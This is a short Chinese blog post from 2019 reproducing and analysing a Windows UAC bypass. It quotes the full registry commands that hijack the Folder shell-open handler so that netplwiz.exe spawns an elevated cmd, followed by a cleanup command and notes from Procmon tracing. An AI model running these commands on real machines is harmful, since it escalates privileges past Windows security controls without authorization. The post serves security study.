GUI_UAC_bypassX
前言
昨天晚上看群发现有人发了个新的Bypass UAC的文章。就复现了一下,顺便分析了一手= =
bypass Demon
链接:
https://github.com/sailay1996/GUI_UAC_bypassX/blob/master/README.md
然后惊人的发现执行的命令和今年1月的命令一毛一样。什么是忍甲,这就是忍甲
https://zhuanlan.zhihu.com/p/55728445
执行以下命令并打开netplwiz.exe然后找到高级点击管理密码,就会弹出个cmd
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f
还原注册表:reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f
分析
打开Procmon.exe配置以下过滤
然后搜索command关键字
大概的搜了一下HKCR注册表(忘了)
执行上面的命令在看了一下刚刚的那个位置发现被加载成功了
针对HKCU\Software\Classes\Folder\shell\open\command
路径看了一下,发现执行了以上的命令打开上面文件夹,盘符等等。全部会执行你那个路径里设置的进程
后面问了某gay友知道HKCU\Software\Classes\Folder\shel
这个路径是windows配置的。至于为什么会出现文件夹和盘符都是执行路径里设置的进程。我bu de而知
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:GUI_UAC_bypassX
本文作者:九世
发布时间:2019-09-03, 09:34:39
最后更新:2019-09-03, 10:02:57
原始链接:http://jiushill.github.io/posts/3fa71b88.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。